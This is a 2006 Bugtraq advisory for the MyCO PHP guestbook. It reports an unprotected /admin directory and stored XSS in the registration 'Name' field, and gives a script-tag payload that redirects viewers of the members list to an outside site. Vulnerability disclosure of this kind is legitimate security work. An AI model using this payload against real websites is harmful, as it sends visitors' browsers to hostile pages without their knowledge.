Bugtraq mailing list archives
MyCO multiple vulnerabilities
From: revnic () gmail com
Date: 31 Jan 2006 08:07:31 -0000
MyCO multiple vulnerabilities Software: MyCO guestbook 1.0 www.punctweb.com Credit: Revnic Vasile revnic () gmail com Description: MyCO is a PHP guestbook that uses a MySQL database Vulnerability: the /admin directory is accessible by everyone. XSS can be injected into the field "Name" when registering a new user. <script>document.location = 'http://some.site/crash_ie.asp';</script> when viewing members list can redirect user's browser to a malicious site.
Current thread:
- MyCO multiple vulnerabilities revnic (Jan 31)